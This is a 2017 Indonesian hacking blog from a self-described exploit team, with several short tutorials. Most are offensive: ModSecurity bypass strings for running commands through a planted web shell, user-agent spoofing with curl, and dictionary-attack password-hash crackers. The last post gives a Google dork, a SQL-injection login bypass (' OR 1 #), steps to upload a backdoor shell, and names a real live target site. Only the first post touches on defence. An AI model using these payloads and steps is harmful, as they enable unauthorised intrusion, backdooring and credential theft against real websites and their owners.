Tuesday, 14 March 2017

Cara Mudah Hindari Serangan SQL Injection & Penggunaan SQLMAP oleh Attacker

Sesuai judul, kali ini gua akan share trik sederhana bagi kalian yang tak ingin websitenya di ubek-ubek oleh tools SQLmap. Ya, SQLmap merupakan sebuah tools yang sangat familiar dikalangan injector/attacker yang suka bermain-main dengan bug-bug SQL. Karena dinilai sangat mudah digunakan dan juga powerfull. Kita jadi tidak usah meng-inject secara manual ke website tujuan kita yang memiliki kelemahan SQL Injection. Tools SQLmap ini sudah akan otomatis meng-injectnya.

Yap, ini dia trik sederhananya. SQLmap sendiri dalam proses meng-injetnya, mengirimkan sebuah request HTTP Header kepada website yang di tuju. Anda bisa melihatnya dengan menambahkan option -v [level] (Verbose) .

> python sqlmap.py -u "localhost/test.php?id=1" --current-os -v 6

Lihatlah hasilnya, Disini kita akan mem-block User-Agent SQLmap, agar pada saat tools ini berjalan akan menghasilkan response lain.

berikut merupakan script sederhana yang saya buat, semoga kalian paham.
(script ini akan mudah di injeksi oleh SQLmap)

(Lalu block user-agent milik SQLmap, seperti yang saya buat pada bagian atas.)

Dan lihatlah perbedaannya saat kita eksekusi kembali pada target yang sama, namun kali ini kita memblock User-Agent nya.
( hasilnya adalah 404 Not Found, sesuai dengan apa yang sudah kita set pada script block nya tadi )

**Cara diatas tadi adalah untuk menghindari serangan dari Tools SQLMAP.
**Untuk Menghindari dari Serangan SQL Injection. Kalian tinggal memberikan beberapa fungsi seperti ini pada parameternya.

(gunakan fungsi mysqli_real_escape_string)

(hasilnya adalah seperti ini, tidak bisa di injeksi)

Oke sekian dulu , semoga bermanfaat .

Bypassing Blocked Linux Command by Mod_Security

Oke kali ini gua akan share tips tentang cara simple membypass command yang di blokir oleh mod_security. Pernah denger bukan?
Gambar terkait
ModSecurity merupakan
modul dari apache yang merupakan salah satu web server yang paling banyak
digunakan. Kebanyakan serangan di internet dilakukan terhadap web untuk itu 
diperlukan pengamanan khusus untuk menangani hal tersebut. Berbagai 
macam cara dapat dilakukan salah satunya adalah memasang WAF (Web 
Application Firewall) salah satu WAF yang dibahas pada artikel ini
adalah ModSecurity.

ModSecurity merupakan web application firewall, Seperti firewall pada
umumnya yaitu melakukan filter data masuk dan keluar dan dapat untuk 
menstop traffic yang dianggap berbahaya sesuai dengan rule yang 
ditetapkan.

Pada ModSecurity terdapat beberapa fitur seperti HTTP Traffic Logging 
yang memungkinkan ModSecurity dapat melakukan full logging pada 
transaksi HTTP. Dan juga terdapat fitur Virtual Patching yang merupakan
sebuah metode untuk melakukan patch sebuah vulnerability sebuah web 
application tanpa menyentuh web application tersebut dengan membuat rule
yang memblok request yang berbahaya.

ModSecurity merupakan WAF yang menyediakan proteksi yang harus disetting
dengan rule karena Metode pemblokiran dari request-request yang 
berbahaya tergantung dari rule yang ditetapkan. Untuk membuat 
ModSecurity lebih powerfull dan untuk memungkinkan pengguna mendapatkan
keuntungan penuh Trustwave's SpiderLabs membuat project OWASP 
ModSecurity Core Rule Set (CRS). CRS memberikan perlindungan generik
dari vulnerabilities yang tidak dikenali pada aplikasi web.

Contohnya, pernah mendapatkan sebuah akses backdoor yang ternyata dalam server tersebut di proteksi oleh modul modSecurity ini?. Dan ketika saja mencoba menjalankan command shell seperti berikut, munculah sesuatu seperti pada gambar dibawah ini.
Yap, seperti itulah hasilnya. Sewaktu kalian ingin menjalakan command linux pada command shell seperti command-command yang biasanya kita gunakan, yaitu:

- id
- uname
- pwd
- whoami

Tenang saja, jangan khawatir karena command-command tersebut masih bisa kita jalankan, tentu saja dengan cara membypassnya. Bagaimana caranya? mudah saja kalian cukup memanfaatkan command SET di Linux. Command SET itu sendiri merupakan command yang digunakan untuk mendefinisikan dan menentukan nilai dari system environtment (lingkungan sistem).

Oke, perhatikan gambar berikut.

Untuk menjalankan command yang di blokir oleh mod_security, cukup tambahkan command SET di depannya. serta pisahkan dengan ";" (tanpa kutip).

contohnya: shell.php?cmd=SET;id

lihat bukan? command yang tadinya akan menghasilkan "Not Acceptable" akan berjalan dengan baik.

Kalian juga dapat membypassnya dengan cara seperti ini:

- shell.php?cmd=SET;id ->shell.php?cmd=set $(id);set
- shell.php?cmd=SET;whoami -> setshell.php?cmd=set $(whoami);set
- shell.php?cmd=set $(uname -r);set

untuk yang menggukana command seperti ?cmd=set $(command);set, anda bisa melihat hasilnya di paling bawah.
(yap ini dia hasilnya ?cmd=set $(uname -rv);set , 3.12.65-188.ELK6.x86_64. Terdapat pada _=)

dan lainnya, kalian juga bisa menggunakan cara ini:

- shell.php?cmd=***;id
- shell.php?cmd=***;whoami

Dimana shell.php merupakan command shell milik kalian, silakan kalian kembangkan.
Oke sekian dulu kawan, semoga menambah wawasan.

Thursday, 9 March 2017

Bypass Blocked User-Agent with cURL [ CLI ]

Halooo, selamat malam. Sesuai judul, kali ini gua akan sedikit membahas tentang bagaimana memanfaatkan sebuah code untuk memblock beberapa User-Agent dan juga pastinya Cara Bypass hal tersebut. Oke Langsung saja.

Pertama, pernahkan kalian membuat sebuah sedikit potongan kode untuk memblock adanya user-agent" yang dianggap sebagai bot? agar tidak bisa mendeteksi situs anda.
Contohnya seperti potongan kode PHP berikut.

Kode diatas dimaksudkan untuk memblokir adanya user-agent bot yang termasuk kedalam list $userAgent. Pada saat kita menggunakan "User-Agent" yang termasuk ke dalam list tersebut. Maka akan menghasilkan output header 404 Not Found. Seperti yang kita set pada script.

Akan gua buktikan seperti ini, gua akan memblockir user-agent curl, agar pada saat kita menggunakan curl untuk melihat website tersebut, maka akan menghasilkan header 404 Not Found.
Saya akan menambahkan list "curl" kedalam variable $userAgent.
(lihat di akhir)

Sekarang kita Coba, dengan menggunakan command curl pada CLI/CMD.
curl -v -k http://website.com/script.php

* -v = digunakan untuk memberikan output http header pada screen (Verbose)
* -k = mengizinkan koneksi ke situs SSL tanpa sertifikat
(terlihat pada gambar, bahwa hasil curl mendapatkan bahwa situs yang di maksud mempunya hasil 404 Not Found [ Halaman tidak ditemukan ], padahal ketika kita buka di browser dapat kita akses)

Nah, Bagaimana jika kita tidak mempunyai hak untuk mengedit file yang memblokir user-agent tersebut? sudah pasti ketika kita ingin membuat sebuah scanner/finder contohnya, hal ini akan sulit. malah kita akan bisa di bodohi oleh hasilnya, yang ternyata dapat diakses malah ternyata tools buatan kita menghasilkan sesuatu yang berbeda dari yang kita inginkan. 

Nah, tenang saja hal ini dapat kita bypass. Bagaimana caranya? Caranya adalah kita ganti HTTP Request User-Agentnya, menjadi user-agent yang tidak terdapat kedalam list (blacklist) script tadi.

Anda bisa gunakan cara yang sama yaitu curl (CLI/CMD) atau bisa juga dengan script biasa. Tambahkan Opsi -H pada curl nya, untuk mengirimkan request HTTP.

curl -v -k -H "User-Agent: Deepweb" http://website.com/script.php
(terlihat beda bukan? kita berhasil membypassnya. lihat bahwa dengan kita menambahkan -H User-Agent pada HTTP Requestnya dan menggantinya dengan User-Agent Lain.(not blacklisted) . Hasilnya menunjukkan 200 OK. [halaman dapat diakses] )

Paham? Mudah Bukan :D


Oke Sekian dulu, semoga bermanfaat :D

Saturday, 4 March 2017

WordPress HASH Decrypter Tools

Okee, selamat sore kawan. Kemarin gua share sedikit tips sederhana bagaimana mendecrypt  sebuah hash hasil fungsi cyrpt dan password_hash pada PHP. Contohnya adalah seperti ini $1$bcl63GxF$FkUtrx6OxdSusl6aTLnYR . Kalian bisa cek artikelnya disini http://www.indoxploit.or.id/2017/03/simple-way-to-decrypt-hash-from-crypt.html.

Oke, kali ini gua akan membahas hal yang sama yaitu mendecrypt hash lagi. Tapi jenis hash apa kali ini?

Karena banyaknya orang yang merequest dan bingung bagaimana memecahkan hash dari CMS WordPress. Kali ini akan gua share tips sederhananya :D

CMS WordPress merupakan salah satu cms yang menggunakan proses hashing yang rumit dalam mengamankan passwordnya. Tidak seperti CMS lain yang rata-rata masih memakai MD5/SHA1.

Oke tidak usah banyak bicara, kita langsung masuk ke pembahasan saja.

( Jalankan di Terminal/CMD [ CLI Based ] )

Kalian lihat bagian ini:
[+]$P$Bd2v1uNoAchuGhnGiwFdS52wmk5.8X0 -> indoxploit (OK)

itu tandanya Hash tersebut sesuai dengan kata 'indoxploit'

Kalian Bisa Mendapatkan Tools ini di Github.

Atau bisa Mendownloadnya:
git clone https://github.com/agussetyar/idx_wpdecrypt.git


Oke sekian dulu, semoga bermanfaat :D

Thursday, 2 March 2017

Simple Way to Decrypt HASH from Crypt, password_hash Function Using Dictionary Attack

Haloooo, selamat malam semua. Dalam kesempatan kali ini gua akan sedikit share trik sederhana/mudah untuk men-decrypt sebuah hash dari fungsi crypt dan password_hash

Sebelumnya, apakah kalian pernah melihat hash seperti ini sebelumnya??
$1$FHBWvpjf$ldIqxhnMjPVoJgScwiDp1/
- $2y$10$BxO1iVD3HYjVO83NJ58VgeM4wNc7gd3gpggEV8OoHzB1dOCThBpb6
- $2y$10$dEuDeZsaw2QVJqERAjivtu2/FttjoW2KLHdZWsDfBR.ZYxCJFH9ha

Pernah kalian lihat?
Yap, itu merupakan hasil hashing dari fungsi crypt dan password_hash

Nah, dalam artikel kali ini. Saya akan memberikan tips sederhana bagaimana mendecrypt hash tersebut. Walaupun tidak pasti 100% berhasil, tapi setidaknya ini akan sedikit membantu.

Script: http://pastebin.com/Sn19ShVX

Cara Pakainya:
(Jalankan di Terminal/CMD [CLI Based] )

Di gambar tersebut kalian melihat bagian:
[+] $2y$10$BxO1iVD3HYjVO83NJ58VgeM4wNc7gd3gpggEV8OoHzB1dOCThBpb6 -> indoxploit (OK)

Itu tandanya, hash tersebut sesuai dengan kata 'indoxploit'

Kalian bisa mencobanya sendiri dengan membuat hash seperti diatas dengan fungsi crypt atau password_hash pada PHP . Dan kalian bisa mencoba tools decrypter simple ini untuk membuktikannya.
Proses nya tergantung dari berapa banyaknya wordlist kalian.

Oke sekian dulu tutorialnya, semoga bermanfaat.

Referensi:

Monday, 27 February 2017

Powered By Nusiorung - Bypassing Admin Login


Google Dork:  intext:"Powered By Nusiorung"

Login Dengan Username & Password
Username : ' OR 1 #
Password : ' OR 1 #




Jika sudah login, langsung menuju "Document" untuk mengupload shell backdoor.



Setelah itu, klik kotak pada bagian bawah


Langsung upload shell kita disini



Jika Sudah, kalian akan melihat shell kalian seperti ini, di dalam list document tadi

( Yang dilingkari merah adalah nama file shell backdoor anda )


Selanjutnya, letak shell kalian ada di:
-> /admin/document/upload/shell.php

Contoh: http://target.com/admin/document/upload/YJE6ZH.php

Live Target: 
http://edu.nmc.ac.th/th/admin/


Oke, Sekian Dulu Tutorial nya, Silakan kalian kembangi lagi.

 

Copyright @ 2016 INDOXPLOIT CODERS TEAM

Designed by Templateiy & CollegeTalks